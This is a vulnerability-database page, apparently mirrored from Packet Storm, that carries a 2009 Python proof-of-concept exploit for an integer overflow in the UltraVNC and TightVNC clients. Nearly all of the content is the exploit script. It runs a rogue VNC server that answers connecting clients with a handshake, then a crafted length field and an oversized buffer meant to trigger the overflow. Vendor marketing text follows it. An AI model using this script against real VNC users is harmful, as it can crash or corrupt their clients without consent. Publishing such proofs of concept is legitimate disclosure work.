Lucene search
K

UltraVNC/TightVNC Integer Overflow

🗓️ 05 Feb 2009 00:00:00Reported by Andres Lopez LuksenbergType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

UltraVNC/TightVNC Integer Overflow Vulnerability Po

Code
`#!/usr/bin/env python  
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568  
#Author: Andres Lopez Luksenberg <[email protected]> (Visit: http://208.66.16.113/~andres/)  
#  
import socket  
  
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
serversocket.bind(('', 5900))  
serversocket.listen(1)  
  
while True:  
print "Author: Andres Lopez Luksenberg <[email protected]> (Visit: http://208.66.16.113/~andres/)"  
  
clientsocket, clientaddres = serversocket.accept()  
  
data = 'RFB 003.003\n'  
clientsocket.sendall(data)  
  
data_cli = clientsocket.recv(1024)  
print data_cli  
  
data = '\x00'  
clientsocket.sendall(data)  
  
data = '\x00\x00\x00\x75'  
clientsocket.sendall(data)  
data = '\x00' * int(0xffffff)  
  
clientsocket.sendall(data)  
  
clientsocket.close()  
serversocket.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
21